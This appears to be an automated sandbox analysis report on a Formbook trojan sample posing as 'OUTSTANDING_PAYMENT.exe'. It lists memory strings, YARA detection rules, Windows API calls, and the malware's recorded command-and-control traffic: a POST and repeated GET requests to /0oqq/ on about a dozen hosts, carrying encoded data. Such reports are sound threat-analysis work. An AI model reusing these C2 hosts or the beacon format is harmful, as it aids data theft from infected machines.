          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/auction/
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/cata
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/domains/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/domains/com/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/domains/rf/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/domains/ru/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medi
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/dedicated/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/shared/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/shared/?ipartner=6666&adv_id=click_vh&utm_source=stpg_all&utm_med
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/hosting/vds-vps/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/mail/on-domain/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/mail/on-domain/?ipartner=6666&adv_id=click_mail&utm_source=stpg_all&utm_m
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/sites/sitebuilder/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/sites/sitebuilder/?ipartner=6666&adv_id=click_sitebuild&utm_source=stpg_a
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/catalog/ssl/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/help/statusnaya-stranica_4785.html?ipartner=6666&adv_id=faq&utm_source=stpg_all&u
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/manager/?ipartner=6666&adv_id=lk_enter&utm_source=stpg_all&utm_medium=link&utm_ca
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/opensearch.xml
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward&
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/product/mail/forward/?ipartner=6666&adv_id=click_mail_forward&utm_source=stpg_all
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru/whois/?searchWord=LANDLOTTO.RU&ipartner=6666&adv_id=whois_info&utm_source=stpg_al
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nic.ru?ipartner=6666&adv_id=logo&utm_source=stpg_all&utm_medium=link&utm_campaign=logo
          Source: unknown | HTTP traffic detected: POST /0oqq/ HTTP/1.1
            Host: www.virginhairweave.co.uk
            Connection: close
            Content-Length: 189
            Cache-Control: no-cache
            Origin: http://www.virginhairweave.co.uk
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.virginhairweave.co.uk/0oqq/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Data Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00
            Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: unknown | DNS traffic detected: queries for: www.themssterofssuepnse.rest
          Source: global traffic | HTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
            Host: www.hudsonandbailey.uk
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1
            Host: www.virginhairweave.co.uk
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== HTTP/1.1
            Host: www.dirdikyepedia.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
            Host: www.g2fm.co.uk
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== HTTP/1.1
            Host: www.mynichemarket.co.uk
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
            Host: www.landlotto.ru
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=rLgLF68UEZ/jOQpbJtvCh1aTqtb77wkxPt9G2kjS7kCRXhXDnB6LHrmjVzEzts5aMFPYOamRADOx5QsnbVGJmi/5P43wAiKcGg== HTTP/1.1
            Host: www.gorwly.top
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== HTTP/1.1
            Host: www.allison2patrick.online
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
            Host: www.glb-mobility.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== HTTP/1.1
            Host: www.fanversewallet.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
            Host: www.karlscurry.co.uk
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
            Host: www.hudsonandbailey.uk
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1
            Host: www.virginhairweave.co.uk
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: initial sample | Static PE information: Filename: OUTSTANDING_PAYMENT.exe
          Source: OUTSTANDING_PAYMENT.exe | Static file information: Suspicious name
          Source: OUTSTANDING_PAYMENT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C5279E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F31D7
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_027F3377
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00405833
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_004038AA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_004038B3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_004222AA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00401B90
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00421BAC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00421CCE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00422584
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0040560B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00405613
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00420709
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00420713
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_004017CF
